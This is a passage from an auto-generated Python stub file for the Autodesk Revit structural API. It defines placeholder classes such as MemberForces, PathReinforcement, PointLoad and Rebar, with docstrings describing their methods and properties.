BoundingBoxXYZ """ pass def ReleaseUnmanagedResources(self, *args): #cannot find CLR method """ ReleaseUnmanagedResources(self: Element, disposing: bool) """ pass def setElementType(self, *args): #cannot find CLR method """ setElementType(self: Element, type: ElementType, incompatibleExceptionMessage: str) """ pass def __enter__(self, *args): #cannot find CLR method """ __enter__(self: IDisposable) -> object """ pass def __exit__(self, *args): #cannot find CLR method """ __exit__(self: IDisposable, exc_type: object, exc_value: object, exc_back: object) """ pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass class MemberForces(object, IDisposable): """ An object that represents a member forces on analytical model element. MemberForces(start: bool, force: XYZ, moment: XYZ) """ def Dispose(self): """ Dispose(self: MemberForces) """ pass def ReleaseUnmanagedResources(self, *args): #cannot find CLR method """ ReleaseUnmanagedResources(self: MemberForces, disposing: bool) """ pass def __enter__(self, *args): #cannot find CLR method """ __enter__(self: IDisposable) -> object """ pass def __exit__(self, *args): #cannot find CLR method """ __exit__(self: IDisposable, exc_type: object, exc_value: object, exc_back: object) """ pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass @staticmethod # known case of __new__ def __new__(self, start, force, moment): """ __new__(cls: type, start: bool, force: XYZ, moment: XYZ) """ pass def __repr__(self, *args): #cannot find CLR method """ __repr__(self: object) -> str """ pass Force = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The translational forces at relative point position of the element. Get: Force(self: MemberForces) -> XYZ Set: Force(self: MemberForces) = value """ IsValidObject = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Specifies whether the .NET object represents a valid Revit entity. Get: IsValidObject(self: MemberForces) -> bool """ Moment = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The rotational forces at relative point position of the element. Get: Moment(self: MemberForces) -> XYZ Set: Moment(self: MemberForces) = value """ Start = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Member Forces position on analytical model stick element. True for start, false for end. Get: Start(self: MemberForces) -> bool Set: Start(self: MemberForces) = value """ class MemberForcesServiceData(object, IDisposable): """ The data needed by member forces server to perform type definition. MemberForcesServiceData(document: Document, currentElementIds: IList[ElementId]) """ def Dispose(self): """ Dispose(self: MemberForcesServiceData) """ pass def GetCurrentElements(self): """ GetCurrentElements(self: MemberForcesServiceData) -> IList[ElementId] Returns the list of Ids of the current elements. Returns: Ids of the current elements. Contains the family base element to which the Member Forces parameters belongs. """ pass def ReleaseUnmanagedResources(self, *args): #cannot find CLR method """ ReleaseUnmanagedResources(self: MemberForcesServiceData, disposing: bool) """ pass def __enter__(self, *args): #cannot find CLR method """ __enter__(self: IDisposable) -> object """ pass def __exit__(self, *args): #cannot find CLR method """ __exit__(self: IDisposable, exc_type: object, exc_value: object, exc_back: object) """ pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass @staticmethod # known case of __new__ def __new__(self, document, currentElementIds): """ __new__(cls: type, document: Document, currentElementIds: IList[ElementId]) """ pass def __repr__(self, *args): #cannot find CLR method """ __repr__(self: object) -> str """ pass Document = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The current document. Get: Document(self: MemberForcesServiceData) -> Document """ IsValidObject = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Specifies whether the .NET object represents a valid Revit entity. Get: IsValidObject(self: MemberForcesServiceData) -> bool """ class MultiplanarOption(Enum, IComparable, IFormattable, IConvertible): """ Input argument type for Rebar.GetCenterlineCurves method. Controls whether all curves of a multi-planar Rebar element are returned by GetCenterlineCurves, or only the curves in the primary plane. enum MultiplanarOption, values: IncludeAllMultiplanarCurves (0), IncludeOnlyPlanarCurves (1) """ def __eq__(self, *args): #cannot find CLR method """ x.__eq__(y) <==> x==yx.__eq__(y) <==> x==yx.__eq__(y) <==> x==y """ pass def __format__(self, *args): #cannot find CLR method """ __format__(formattable: IFormattable, format: str) -> str """ pass def __ge__(self, *args): #cannot find CLR method pass def __gt__(self, *args): #cannot find CLR method pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass def __le__(self, *args): #cannot find CLR method pass def __lt__(self, *args): #cannot find CLR method pass def __ne__(self, *args): #cannot find CLR method pass def __reduce_ex__(self, *args): #cannot find CLR method pass def __str__(self, *args): #cannot find CLR method pass IncludeAllMultiplanarCurves = None IncludeOnlyPlanarCurves = None value__ = None class PathReinforcement(Element, IDisposable): """ An object that represents an Path Reinforcement within the Autodesk Revit project. """ @staticmethod def Create(document, hostElement, curveArray, flip, pathReinforcementTypeId, rebarBarTypeId, startRebarHookTypeId, endRebarHookTypeId, rebarShapeId=None): """ Create(document: Document, hostElement: Element, curveArray: IList[Curve], flip: bool, pathReinforcementTypeId: ElementId, rebarBarTypeId: ElementId, startRebarHookTypeId: ElementId, endRebarHookTypeId: ElementId) -> PathReinforcement Create(document: Document, hostElement: Element, curveArray: IList[Curve], flip: bool, pathReinforcementTypeId: ElementId, rebarBarTypeId: ElementId, startRebarHookTypeId: ElementId, endRebarHookTypeId: ElementId, rebarShapeId: ElementId) -> PathReinforcement """ pass def Dispose(self): """ Dispose(self: Element, A_0: bool) """ pass def getBoundingBox(self, *args): #cannot find CLR method """ getBoundingBox(self: Element, view: View) -> BoundingBoxXYZ """ pass def GetCurveElementIds(self): """ GetCurveElementIds(self: PathReinforcement) -> IList[ElementId] Retrieves the set of ElementIds of curves forming the boundary of the Path Reinforcement. Returns: A collection of ElementIds of ModelCurve elements. """ pass def GetHostId(self): """ GetHostId(self: PathReinforcement) -> ElementId The element that contains the Path Reinforcement. Returns: The element that the Path Reinforcement object belongs to, such as a structural wall, floor or foundation. """ pass @staticmethod def GetOrCreateDefaultRebarShape(document, rebarBarTypeId, startRebarHookTypeId, endRebarHookTypeId): """ GetOrCreateDefaultRebarShape(document: Document, rebarBarTypeId: ElementId, startRebarHookTypeId: ElementId, endRebarHookTypeId: ElementId) -> ElementId Creates a new RebarShape object with a default name or returns existing one which fulfills Path Reinforcement bending data requirements. document: The document. rebarBarTypeId: The id of the RebarBarType. startRebarHookTypeId: The id of the RebarHookType for the start of the bar. If this parameter is InvalidElementId, it means to create a rebar with no start hook. endRebarHookTypeId: The id of the RebarHookType for the end of the bar. If this parameter is InvalidElementId, it means to create a rebar with no end hook. Returns: Rebar Shape id. """ pass def GetRebarInSystemIds(self): """ GetRebarInSystemIds(self: PathReinforcement) -> IList[ElementId] Returns the ids of the RebarInSystem elements owned by the PathReinforcement element. """ pass def IsAlternatingLayerEnabled(self): """ IsAlternatingLayerEnabled(self: PathReinforcement) -> bool Checks if alternating bars are present in Path Reinforcement. Returns: True if the alternating bars exist in Path Reinforcement instance. """ pass def IsSolidInView(self, view): """ IsSolidInView(self: PathReinforcement, view: View3D) -> bool Checks if this Path Reinforcement is shown solidly in a 3D view. view: The 3D view element Returns: True if Path Reinforcement is shown solidly, false otherwise. """ pass def IsUnobscuredInView(self, view): """ IsUnobscuredInView(self: PathReinforcement, view: View) -> bool Checks if Path Reinforcement is shown unobscured in a view. view: The view element Returns: True if Path Reinforcement is shown unobscured, false otherwise. """ pass def IsValidAlternatingBarOrientation(self, orientation): """ IsValidAlternatingBarOrientation(self: PathReinforcement, orientation: ReinforcementBarOrientation) -> bool Checks if orientation for alternating bars is valid. orientation: An orientation. Returns: True if orientation for alternating bars are valid. """ pass def IsValidPrimaryBarOrientation(self, orientation): """ IsValidPrimaryBarOrientation(self: PathReinforcement, orientation: ReinforcementBarOrientation) -> bool Checks if orientation for primary bars is valid. orientation: An orientation. Returns: True if orientation for primary bars are valid. """ pass @staticmethod def IsValidRebarShapeId(aDoc, elementId): """ IsValidRebarShapeId(aDoc: Document, elementId: ElementId) -> bool Identifies whether an element id corresponds to a Rebar Shape element which can be used in Path Reinforcement. aDoc: The document. elementId: An element id. Returns: True if the specified element id corresponds to a Rebar Shape element. """ pass def ReleaseUnmanagedResources(self, *args): #cannot find CLR method """ ReleaseUnmanagedResources(self: Element, disposing: bool) """ pass @staticmethod def RemovePathReinforcementSystem(doc, system): """ RemovePathReinforcementSystem(doc: Document, system: PathReinforcement) -> IList[ElementId] Deletes the specified PathReinforcement, and converts its RebarInSystem elements to equivalent Rebar elements. doc: The document. system: A PathReinforcement element in the document. Returns: The ids of the newly created Rebar elements. """ pass def setElementType(self, *args): #cannot find CLR method """ setElementType(self: Element, type: ElementType, incompatibleExceptionMessage: str) """ pass def SetSolidInView(self, view, solid): """ SetSolidInView(self: PathReinforcement, view: View3D, solid: bool) Sets this Path Reinforcement to be shown solidly in a 3D view. view: The 3D view element solid: True if Path Reinforcement is shown solidly, false otherwise. """ pass def SetUnobscuredInView(self, view, unobscured): """ SetUnobscuredInView(self: PathReinforcement, view: View, unobscured: bool) Sets Path Reinforcement to be shown unobscured in a view. view: The view element unobscured: True if Path Reinforcement is shown unobscured, false otherwise. """ pass def __enter__(self, *args): #cannot find CLR method """ __enter__(self: IDisposable) -> object """ pass def __exit__(self, *args): #cannot find CLR method """ __exit__(self: IDisposable, exc_type: object, exc_value: object, exc_back: object) """ pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass AdditionalOffset = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Additional offset of rebars in the Path Reinforcement. Get: AdditionalOffset(self: PathReinforcement) -> float Set: AdditionalOffset(self: PathReinforcement) = value """ AlternatingBarOrientation = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Orientation of alternating bars of Path Reinforcement. Get: AlternatingBarOrientation(self: PathReinforcement) -> ReinforcementBarOrientation Set: AlternatingBarOrientation(self: PathReinforcement) = value """ AlternatingBarShapeId = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The RebarShape element that defines the shape of the alternating bars of the Path Reinforcement. Get: AlternatingBarShapeId(self: PathReinforcement) -> ElementId Set: AlternatingBarShapeId(self: PathReinforcement) = value """ PathReinforcementType = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Retrieves the type of the Path Reinforcement. Get: PathReinforcementType(self: PathReinforcement) -> PathReinforcementType """ PrimaryBarOrientation = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Orientation of primary bars of Path Reinforcement. Get: PrimaryBarOrientation(self: PathReinforcement) -> ReinforcementBarOrientation Set: PrimaryBarOrientation(self: PathReinforcement) = value """ PrimaryBarShapeId = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The RebarShape element that defines the shape of the primary bars of the Path Reinforcement. Get: PrimaryBarShapeId(self: PathReinforcement) -> ElementId Set: PrimaryBarShapeId(self: PathReinforcement) = value """ class PathReinforcementType(ElementType, IDisposable): """ An object that specifies the type of a Structural Path Reinforcement element in Autodesk Revit. """ @staticmethod def CreateDefaultPathReinforcementType(ADoc): """ CreateDefaultPathReinforcementType(ADoc: Document) -> ElementId Creates a new PathReinforcementType object with a default name. ADoc: The document. Returns: The newly created type id. """ pass def Dispose(self): """ Dispose(self: Element, A_0: bool) """ pass def getBoundingBox(self, *args): #cannot find CLR method """ getBoundingBox(self: Element, view: View) -> BoundingBoxXYZ """ pass def ReleaseUnmanagedResources(self, *args): #cannot find CLR method """ ReleaseUnmanagedResources(self: Element, disposing: bool) """ pass def setElementType(self, *args): #cannot find CLR method """ setElementType(self: Element, type: ElementType, incompatibleExceptionMessage: str) """ pass def __enter__(self, *args): #cannot find CLR method """ __enter__(self: IDisposable) -> object """ pass def __exit__(self, *args): #cannot find CLR method """ __exit__(self: IDisposable, exc_type: object, exc_value: object, exc_back: object) """ pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass class PathReinSpanSymbol(IndependentTag, IDisposable): """ Represents a Path Reinforcement Span Symbol element in Autodesk Revit. """ @staticmethod def Create(document, viewId, hostId, point, symbolId): """ Create(document: Document, viewId: ElementId, hostId: LinkElementId, point: XYZ, symbolId: ElementId) -> PathReinSpanSymbol Creates a new instance of PathReinSpanSymbol in the project. document: The document. viewId: The id of the view in which the symbol should appear. hostId: The ElementId of PathReinforcement (either in the document, or linked from another document). point: The span symbol's head position. symbolId: The family symbol id of this element. Returns: A reference to newly created span symbol. """ pass def Dispose(self): """ Dispose(self: Element, A_0: bool) """ pass def getBoundingBox(self, *args): #cannot find CLR method """ getBoundingBox(self: Element, view: View) -> BoundingBoxXYZ """ pass def ReleaseUnmanagedResources(self, *args): #cannot find CLR method """ ReleaseUnmanagedResources(self: Element, disposing: bool) """ pass def setElementType(self, *args): #cannot find CLR method """ setElementType(self: Element, type: ElementType, incompatibleExceptionMessage: str) """ pass def __enter__(self, *args): #cannot find CLR method """ __enter__(self: IDisposable) -> object """ pass def __exit__(self, *args): #cannot find CLR method """ __exit__(self: IDisposable, exc_type: object, exc_value: object, exc_back: object) """ pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass class PointLoad(LoadBase, IDisposable): """ An object that represents a force/moment applied to a single point. """ @staticmethod def Create(aDoc, *__args): """ Create(aDoc: Document, host: AnalyticalModelStick, selector: AnalyticalElementSelector, forceVector: XYZ, momentVector: XYZ, symbol: PointLoadType) -> PointLoad Creates a new hosted point load within the project. aDoc: Document to which new point load will be added. host: The AnalyticalModelStick (Analytical Beam, Analytical Brace, Analytical Column) host element for the point Load. selector: The start or end point of the Analytical stick element. forceVector: The applied 3d force vector. momentVector: The applied 3d moment vector. symbol: The symbol of the PointLoad. Set ll to use default type. Returns: If successful, returns the newly created PointLoad, ll otherwise. Create(aDoc: Document, host: AnalyticalModel, forceVector: XYZ, momentVector: XYZ, symbol: PointLoadType) -> PointLoad Creates a new hosted point load within the project. aDoc: Document to which new point load will be added. host: The Analytical Isolated Foundation type host element for the point Load. forceVector: The applied 3d force vector. momentVector: The applied 3d moment vector. symbol: The symbol of the PointLoad. Set ll to use default type. Returns: If successful, returns the newly created PointLoad, ll otherwise. Create(aDoc: Document, point: XYZ, forceVector: XYZ, momentVector: XYZ, symbol: PointLoadType, plane: SketchPlane) -> PointLoad Creates a new non-hosted point load within the project using data at point. aDoc: Document to which new point load will be added. point: The position of point load, measured in decimal feet. forceVector: The applied 3d force vector. momentVector: The applied 3d moment vector. symbol: The symbol of the PointLoad. Set ll to use default type. plane: The work plane of the PointLoad. Set ll to use default plane. Returns: If successful, returns the newly created PointLoad, ll otherwise. """ pass def Dispose(self): """ Dispose(self: Element, A_0: bool) """ pass def getBoundingBox(self, *args): #cannot find CLR method """ getBoundingBox(self: Element, view: View) -> BoundingBoxXYZ """ pass def ReleaseUnmanagedResources(self, *args): #cannot find CLR method """ ReleaseUnmanagedResources(self: Element, disposing: bool) """ pass def setElementType(self, *args): #cannot find CLR method """ setElementType(self: Element, type: ElementType, incompatibleExceptionMessage: str) """ pass def __enter__(self, *args): #cannot find CLR method """ __enter__(self: IDisposable) -> object """ pass def __exit__(self, *args): #cannot find CLR method """ __exit__(self: IDisposable, exc_type: object, exc_value: object, exc_back: object) """ pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass ForceVector = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The force vector applied to the point load, oriented according to OrientTo setting. Get: ForceVector(self: PointLoad) -> XYZ Set: ForceVector(self: PointLoad) = value """ MomentVector = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The moment vector applied to the point load, oriented according to OrientTo setting. Get: MomentVector(self: PointLoad) -> XYZ Set: MomentVector(self: PointLoad) = value """ Point = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Returns the position of point load, measured in decimal feet. Get: Point(self: PointLoad) -> XYZ Set: Point(self: PointLoad) = value """ class PointLoadType(LoadTypeBase, IDisposable): """ An object that represents a Load type. """ def Dispose(self): """ Dispose(self: Element, A_0: bool) """ pass def getBoundingBox(self, *args): #cannot find CLR method """ getBoundingBox(self: Element, view: View) -> BoundingBoxXYZ """ pass def ReleaseUnmanagedResources(self, *args): #cannot find CLR method """ ReleaseUnmanagedResources(self: Element, disposing: bool) """ pass def setElementType(self, *args): #cannot find CLR method """ setElementType(self: Element, type: ElementType, incompatibleExceptionMessage: str) """ pass def __enter__(self, *args): #cannot find CLR method """ __enter__(self: IDisposable) -> object """ pass def __exit__(self, *args): #cannot find CLR method """ __exit__(self: IDisposable, exc_type: object, exc_value: object, exc_back: object) """ pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass class Rebar(Element, IDisposable): """ Represents a rebar element in Autodesk Revit. """ def CanApplyPresentationMode(self, dBView): """ CanApplyPresentationMode(self: Rebar, dBView: View) -> bool Checks if a presentation mode can be applied for this rebar in the given view. dBView: The view in which presentation mode will be applied. Returns: True if presentation mode can be applied for this view, false otherwise. """ pass def CanSuppressFirstOrLastBar(self, dBView, end): """ CanSuppressFirstOrLastBar(self: Rebar, dBView: View, end: int) -> bool Checks if the first or last bar in rebar set can be hidden in the given view. dBView: The view in which presentation mode will be applied. end: 0 for the first bar in rebar set, 1 for the last bar. Returns: True the first or last bar in rebar set can be hidden for this view, false otherwise. """ pass def CanUseHookType(self, proposedHookId): """ CanUseHookType(self: Rebar, proposedHookId: ElementId) -> bool Checks if the specified RebarHookType id is of a valid RebarHookType for the Rebar's RebarBarType proposedHookId: The Id of the RebarHookType Returns: Returns true if the id is of a valid RebarHookType for the Rebar element. """ pass def ClearPresentationMode(self, dBView): """ ClearPresentationMode(self: Rebar, dBView: View) Sets the presentation mode for this rebar set to the default (either for a single view, or for all views). dBView: The view where the presentation mode will be cleared. NULL for all views """ pass def ComputeDrivingCurves(self): """ ComputeDrivingCurves(self: Rebar) -> IList[Curve] Compute the driving curves. Returns: Returns an empty array if an error is encountered. """ pass def ConstraintsCanBeEdited(self): """ ConstraintsCanBeEdited(self: Rebar) -> bool Returns true, if the Rebar element's external constraints are available for editing using the RebarConstraintsManager class. Examples of where this method would return false are: Rebar in Groups (which do not have constraints), or legacy, sketch-based Rebar elements created before the introduction of RebarShape families in version 2009. """ pass @staticmethod def ContainsValidArcRadiiForStyleAndBarType(curves, style, barType): """ ContainsValidArcRadiiForStyleAndBarType(curves: IList[Curve], style: RebarStyle, barType: RebarBarType) -> bool """ pass @staticmethod def CreateFromCurves(doc, style, barType, startHook, endHook, host, norm, curves, startHookOrient, endHookOrient, useExistingShapeIfPossible, createNewShape): """ CreateFromCurves(doc: Document, style: RebarStyle, barType: RebarBarType, startHook: RebarHookType, endHook: RebarHookType, host: Element, norm: XYZ, curves: IList[Curve], startHookOrient: RebarHookOrientation, endHookOrient: RebarHookOrientation, useExistingShapeIfPossible: bool, createNewShape: bool) -> Rebar """ pass @staticmethod def CreateFromCurvesAndShape(doc, rebarShape, barType, startHook, endHook, host, norm, curves, startHookOrient, endHookOrient): """ CreateFromCurvesAndShape(doc: Document, rebarShape: RebarShape, barType: RebarBarType, startHook: RebarHookType, endHook: RebarHookType, host: Element, norm: XYZ, curves: IList[Curve], startHookOrient: RebarHookOrientation, endHookOrient: RebarHookOrientation) -> Rebar """ pass @staticmethod def CreateFromRebarShape(doc, rebarShape, barType, host, origin, xVec, yVec): """ CreateFromRebarShape(doc: Document, rebarShape: RebarShape, barType: RebarBarType, host: Element, origin: XYZ, xVec: XYZ, yVec: XYZ) -> Rebar Creates a new Rebar, as an instance of a RebarShape. The instance will have the default shape parameters from the RebarShape, and its location is based on the bounding box of the shape in the shape definition. Hooks are removed from the shape before computing its bounding box. If appropriate hooks can be found in the document, they will be assigned arbitrarily. doc: A document. rebarShape: A RebarShape element that defines the shape of the rebar. barType: A RebarBarType element that defines bar diameter, bend radius and material of the rebar. host: The element to which the rebar belongs. The element must support rebar hosting; see Autodesk.Revit.DB.Structure.RebarHostData. origin: The lower-left corner of the shape's bounding box will be placed at this point in the project. xVec: The x-axis in the shape definition will be mapped to this direction in the project. yVec: The y-axis in the shape definition will be mapped to this direction in the project. Returns: The newly created Rebar instance, or ll if the operation fails. """ pass def Dispose(self): """ Dispose(self: Element, A_0: bool) """ pass def DoesBarExistAtPosition(self, barPosition): """ DoesBarExistAtPosition(self: Rebar, barPosition: int) -> bool Checks whether a bar exists at the specified position. barPosition: A bar position index between 0 and NumberOfBarPositions-1. """ pass def FindMatchingPredefinedPresentationMode(self, dBView): """ FindMatchingPredefinedPresentationMode(self: Rebar, dBView: View) -> RebarPresentationMode Determines if there is a matching RebarPresentationMode for the current set of selected hidden and unhidden bars assigned to the given view. dBView: The view. Returns: The presentation mode that matches the current set of selected hidden and unhidden bars. If there is no better match, this returns RebarPresentationMode.Select. """ pass def GetBarPositionTransform(self, barPositionIndex): """ GetBarPositionTransform(self: Rebar, barPositionIndex: int) -> Transform Return a transform representing the relative position of any individual bar in the set. barPositionIndex: An index between 0 and (NumberOfBarPositions-1). Returns: The position of a bar in the set relative to the first position. """ pass def GetBendData(self): """ GetBendData(self: Rebar) -> RebarBendData Gets the RebarBendData, containing bar and hook information, of the instance. """ pass def getBoundingBox(self, *args): #cannot find CLR method """ getBoundingBox(self: Element, view: View) -> BoundingBoxXYZ """ pass def GetCenterlineCurves(self, adjustForSelfIntersection, suppressHooks, suppressBendRadius, multiplanarOption=None, barPositionIndex=None): """ GetCenterlineCurves(self: Rebar, adjustForSelfIntersection: bool, suppressHooks: bool, suppressBendRadius: bool) -> IList[Curve] A chain of curves representing the centerline of the rebar. adjustForSelfIntersection: If the curves overlap, as in a planar stirrup, this parameter controls whether they should be adjusted to avoid intersection (as in fine views), or kept in a single plane for simplicity (as in coarse views). suppressHooks: Identifies if the chain will include hooks curves. suppressBendRadius: Identifies if the connected chain will include unfilleted curves. Returns: The centerline curves or empty array if the curves cannot be computed because the parameters values are inconsistent with the constraints of the RebarShape definition. GetCenterlineCurves(self: Rebar, adjustForSelfIntersection: bool, suppressHooks: bool, suppressBendRadius: bool, multiplanarOption: MultiplanarOption) -> IList[Curve] A chain of curves representing the centerline of the rebar. adjustForSelfIntersection: If the curves overlap, as in a planar stirrup, this parameter controls whether they should be adjusted to avoid intersection (as in fine views), or kept in a single plane for simplicity (as in coarse views). suppressHooks: Identifies if the chain will include hooks curves. suppressBendRadius: Identifies if the connected chain will include unfilleted curves. multiplanarOption: If the Rebar is a multi-planar shape, this parameter controls whether to generate only the curves in the primary plane (IncludeOnlyPlanarCurves), or to generate all curves, (IncludeAllMultiplanarCurves) including the out-of-plane connector segments as well as multi-planar copies of the primary plane curves. This argument is ignored for planar shapes. Returns: The centerline curves or empty array if the curves cannot be computed because the parameters values are inconsistent with the constraints of the RebarShape definition. GetCenterlineCurves(self: Rebar, adjustForSelfIntersection: bool, suppressHooks: bool, suppressBendRadius: bool, multiplanarOption: MultiplanarOption, barPositionIndex: int) -> IList[Curve] A chain of curves representing the centerline of the rebar. adjustForSelfIntersection: If the curves overlap, as in a planar stirrup, this parameter controls whether they should be adjusted to avoid intersection (as in fine views), or kept in a single plane for simplicity (as in coarse views). suppressHooks: Identifies if the chain will include hooks curves. suppressBendRadius: Identifies if the connected chain will include unfilleted curves. multiplanarOption: If the Rebar is a multi-planar shape, this parameter controls whether to generate only the curves in the primary plane (IncludeOnlyPlanarCurves), or to generate all curves, (IncludeAllMultiplanarCurves) including the out-of-plane connector segments as well as multi-planar copies of the primary plane curves. This argument is ignored for planar shapes. barPositionIndex: An index between 0 and (NumberOfBarPositions-1). Use the barPositionIndex to obtain all the curves at a specific index in the distribution. You can use GetNumberOfBarPositions() to verify if a specific rebar has more than one bar positions. Use GetDistributionType() to probe if the bars in a specific rebar have a varying shape. If so, you can retrieve the centerline curve geometry of that particular bar, by passing the appropriate index. When the distribution type of a rebar set is uniform, the form of the bars does not vary from one index to another. Returns: The centerline curves or empty array if the curves cannot be computed because the parameters values are inconsistent with the constraints of the RebarShape definition. """ pass def GetCouplerId(self, end): """ GetCouplerId(self: Rebar, end: int) -> ElementId Get the id of the Rebar Coupler that is applied to the rebar at the specified end. end: 0 for the start Rebar Coupler, 1 for the end Rebar Coupler. Returns: The id of a Rebar Coupler, or invalidElementId if the rebar has no Rebar Coupler at the specified end. """ pass def GetDistributionPath(self): """ GetDistributionPath(self: Rebar) -> Line The distribution path of a rebar set. Returns: A line beginning at (0, 0, 0) and representing the direction and length of the set. """ pass def GetEndTreatmentTypeId(self, end): """ GetEndTreatmentTypeId(self: Rebar, end: int) -> ElementId Get the id of the EndTreatmentType to be applied to the rebar. end: 0 for the start end treatment, 1 for the end end treatment. Returns: The id of a EndTreatmentType, or invalidElementId if the rebar has no end treatment at the specified end. """ pass def GetFullGeometryForView(self, view): """ GetFullGeometryForView(self: Rebar, view: View) -> GeometryElement Generates full geometry for the Rebar for a specific view. view: The view in which the geometry is generated. Returns: The generated geometry of the Rebar before cutting is applied. """ pass def GetHookOrientation(self, iEnd): """ GetHookOrientation(self: Rebar, iEnd: int) -> RebarHookOrientation Returns the orientation of the hook plane at the start or at the end of the rebar with respect to the orientation of the first or the last curve and the plane normal. iEnd: 0 for the start hook, 1 for the end hook. Returns: Value = Right: The hook is on your right as you stand at the end of the bar, with the bar behind you, taking the bar's normal as "up." Value = Left: The hook is on your left as you stand at the end of the bar, with the bar behind you, taking the bar's normal as "up." """ pass def GetHookTypeId(self, end): """ GetHookTypeId(self: Rebar, end: int) -> ElementId Get the id of the RebarHookType to be applied to the rebar. end: 0 for the start hook, 1 for the end hook. Returns: The id of a RebarHookType, or invalidElementId if the rebar has no hook at the specified end. """ pass def GetHostId(self): """ GetHostId(self: Rebar) -> ElementId The element that contains the rebar. Returns: The element that the rebar object belongs to, such as a structural wall, floor, foundation, beam, brace or column. """ pass def GetParameterValueAtIndex(self, paramId, barPositionIndex): """ GetParameterValueAtIndex(self: Rebar, paramId: ElementId, barPositionIndex: int) -> ParameterValue Get the parameter value for a bar at the specified index. The parameter Id. The bar index in the rebar distribution. Accepts only values between 0 and NumberOfBarPositions-1. The ParameterValue for given parameterId and barPositionIndex. Throws exception if barPositionIndex is outside boundaries. """ pass def GetPresentationMode(self, dBView): """ GetPresentationMode(self: Rebar, dBView: View) -> RebarPresentationMode Gets the presentation mode for this rebar set when displayed in the given view. dBView: The view. Returns: The presentation mode. """ pass def GetRebarConstraintsManager(self): """ GetRebarConstraintsManager(self: Rebar) -> RebarConstraintsManager Returns an object for managing the external constraints on the Rebar element """ pass def GetReinforcementRoundingManager(self): """ GetReinforcementRoundingManager(self: Rebar) -> RebarRoundingManager Returns an object for managing reinforcement rounding override settings. Returns: The rounding manager. """ pass def HasPresentationOverrides(self, dBView): """ HasPresentationOverrides(self: Rebar, dBView: View) -> bool Identifies if this Rebar has overridden default presentation settings for the given view. dBView: The view. Returns: True if this Rebar has overriden default presentation settings, false otherwise. """ pass def HookAngleMatchesRebarShapeDefinition(self, iEnd, proposedHookId): """ HookAngleMatchesRebarShapeDefinition(self: Rebar, iEnd: int, proposedHookId: ElementId) -> bool Checks that the hook angle of the specified RebarHookType matches the hook angle used in the Rebar's RebarShape at the specified end of the bar. iEnd: 0 for the start hook, 1 for the end hook. proposedHookId: The Id of the RebarHookType Returns: Returns true if the hook angle of the RebarHookType matches the angle used in the RebarShape at the specified end of the bar. """ pass def IsBarHidden(self, view, barIndex): """ IsBarHidden(self: Rebar, view: View, barIndex: int) -> bool Identifies if a given bar in this rebar set is hidden in this view. view: The view. barIndex: The index of the bar from this rebar set. Returns: True if the bar is hidden in this view, false otherwise. """ pass def IsRebarInSection(self, dBView): """ IsRebarInSection(self: Rebar, dBView: View) -> bool Identifies if this Rebar is shown as a cross-section in the given view. dBView: The view. Returns: True if this Rebar is shown as a cross-section, false otherwise. """ pass def IsSolidInView(self, view): """ IsSolidInView(self: Rebar, view: View3D) -> bool Checks if this rebar element is shown solidly in a 3D view. view: The 3D view element Returns: True if rebar is shown solidly, false otherwise. """ pass def IsUnobscuredInView(self, view): """ IsUnobscuredInView(self: Rebar, view: View) -> bool Checks if this rebar element is shown unobscured in a view. view: The view element Returns: True if rebar is shown unobscured, false otherwise. """ pass @staticmethod def RebarShapeMatchesCurvesAndHooks(rebarShape, barType, norm, curves, startHook, endHook, startHookOrient, endHookOrient): """ RebarShapeMatchesCurvesAndHooks(rebarShape: RebarShape, barType: RebarBarType, norm: XYZ, curves: IList[Curve], startHook: RebarHookType, endHook: RebarHookType, startHookOrient: RebarHookOrientation, endHookOrient: RebarHookOrientation) -> bool """ pass def ReleaseUnmanagedResources(self, *args): #cannot find CLR method """ ReleaseUnmanagedResources(self: Element, disposing: bool) """ pass def ScaleToBox(self, origin, xVec, yVec): """ ScaleToBox(self: Rebar, origin: XYZ, xVec: XYZ, yVec: XYZ) Move and resize the bar to fit within a specified box. 